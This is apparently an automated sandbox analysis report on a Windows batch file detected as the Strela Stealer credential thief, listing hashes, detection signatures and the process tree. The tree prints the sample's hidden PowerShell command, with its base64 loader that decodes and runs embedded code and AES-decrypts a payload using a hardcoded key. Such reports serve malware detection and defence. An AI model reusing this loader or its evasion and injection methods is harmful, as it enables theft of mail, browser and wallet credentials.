Edit tour
Windows
Analysis Report
demo.bat1.bat
Overview
General Information
| Sample name: | demo.bat1.bat |
| Analysis ID: | 1637367 |
| MD5: | b78cab86a0799e78040d7ee6a661c13c |
| SHA1: | 793a7487440db8e6d8e48c5529019b0d40a87974 |
| SHA256: | de10accbf325ba23a8f4550e42af20bcd56570a0d0075aafb63a7658586f23af |
| Tags: | batuser-TornadoAV_dev |
| Infos: |   |
 | |
Detection
Batch Injector, Strela Stealer
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Generic Stealer
Yara detected Powershell decode and execute
Yara detected Strela Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses powershell cmdlets to delay payload execution
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 7996 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\demo. bat1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 8048 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\demo.b at1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8056 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 8104 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('JHVzZXJ OYW1lID0gJ GVudjpVU0V STkFNRTskY XNidmwgPSA iQzpcVXNlc nNcJHVzZXJ OYW1lXGR3b S5iYXQiO2l mIChUZXN0L VBhdGggJGF zYnZsKSB7I CAgIFdyaXR lLUhvc3QgI kJhdGNoIGZ pbGUgZm91b mQ6ICRhc2J 2bCIgLUZvc mVncm91bmR Db2xvciBDe WFuOyAgICA kZmlsZUxpb mVzID0gW1N 5c3RlbS5JT y5GaWxlXTo 6UmVhZEFsb ExpbmVzKCR hc2J2bCwgW 1N5c3RlbS5 UZXh0LkVuY 29kaW5nXTo 6VVRGOCk7I CAgIGZvcmV hY2ggKCRsa W5lIGluICR maWxlTGluZ XMpIHsgICA gICAgIGlmI CgkbGluZSA tbWF0Y2ggJ 146OjogPyg uKykkJykge yAgICAgICA gICAgIFdya XRlLUhvc3Q gIkluamVjd GlvbiBjb2R lIGRldGVjd GVkIGluIHR oZSBiYXRja CBmaWxlLiI gLUZvcmVnc m91bmRDb2x vciBDeWFuO yAgICAgICA gICAgIHRye SB7ICAgICA gICAgICAgI CAgICRkZWN vZGVkQnl0Z XMgPSBbU3l zdGVtLkNvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKCRtYXRja GVzWzFdLlR yaW0oKSk7I CAgICAgICA gICAgICAgI CRpbmplY3R pb25Db2RlI D0gW1N5c3R lbS5UZXh0L kVuY29kaW5 nXTo6VW5pY 29kZS5HZXR TdHJpbmcoJ GRlY29kZWR CeXRlcyk7I CAgICAgICA gICAgICAgI FdyaXRlLUh vc3QgIklua mVjdGlvbiB jb2RlIGRlY 29kZWQgc3V jY2Vzc2Z1b Gx5LiIgLUZ vcmVncm91b mRDb2xvciB HcmVlbjsgI CAgICAgICA gICAgICAgV 3JpdGUtSG9 zdCAiRXhlY 3V0aW5nIGl uamVjdGlvb iBjb2RlLi4 uIiAtRm9yZ Wdyb3VuZEN vbG9yIFllb GxvdzsgICA gICAgICAgI CAgICAgSW5 2b2tlLUV4c HJlc3Npb24 gJGluamVjd GlvbkNvZGU 7ICAgICAgI CAgICAgICA gIGJyZWFrO yAgICAgICA gICAgIH0gY 2F0Y2ggeyA gICAgICAgI CAgICAgICB Xcml0ZS1Ib 3N0ICJFcnJ vciBkdXJpb mcgZGVjb2R pbmcgb3IgZ XhlY3V0aW5 nIGluamVjd GlvbiBjb2R lOiAkXyIgL UZvcmVncm9 1bmRDb2xvc iBSZWQ7ICA gICAgICAgI CAgfTsgICA gICAgIH07I CAgIH07fSB lbHNlIHsgI CAgICBXcml 0ZS1Ib3N0I CJTeXN0ZW0 gRXJyb3I6I EJhdGNoIGZ pbGUgbm90I GZvdW5kOiA kYXNidmwiI C1Gb3JlZ3J vdW5kQ29sb 3IgUmVkOyA gICBleGl0O 307ZnVuY3R pb24gYWJoc WcoJHBhcmF tX3Zhcil7C SRhZXNfdmF yPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkFlc106O kNyZWF0ZSg pOwkkYWVzX 3Zhci5Nb2R lPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkNpcGhlc k1vZGVdOjp DQkM7CSRhZ XNfdmFyLlB hZGRpbmc9W 1N5c3RlbS5 TZWN1cml0e S5DcnlwdG9 ncmFwaHkuU GFkZGluZ01 vZGVdOjpQS 0NTNzsJJGF lc192YXIuS 2V5PVtTeXN 0ZW0uQ29ud mVydF06OkZ yb21CYXNlN jRTdHJpbmc oJ214b1B2T kZBYUZIZmt zR0lSQWpJT 2MwellwV0l HYjluOGVGO URwYjFYU0U 9Jyk7CSRhZ XNfdmFyLkl WPVtTeXN0Z W0uQ29udmV ydF06OkZyb 21CYXNlNjR TdHJpbmcoJ zJZK1BsWjJ Pc0ZySTJwT EI3anBPZkE 9PScpOwkkZ GVjcnlwdG9 yX3Zhcj0kY WVzX3Zhci5 DcmVhdGVEZ WNyeXB0b3I oKTsJJHJld HVybl92YXI 9JGRlY3J5c HRvcl92YXI uVHJhbnNmb 3JtRmluYWx CbG9jaygkc GFyYW1fdmF yLCAwLCAkc GFyYW1fdmF yLkxlbmd0a Ck7CSRkZWN yeXB0b3Jfd mFyLkRpc3B vc2UoKTsJJ GFlc192YXI uRGlzcG9zZ SgpOwkkcmV 0dXJuX3Zhc jt9ZnVuY3R pb24gdnZ1d 3UoJHBhcmF tX3Zhcil7C SR1YnJycj1 OZXctT2JqZ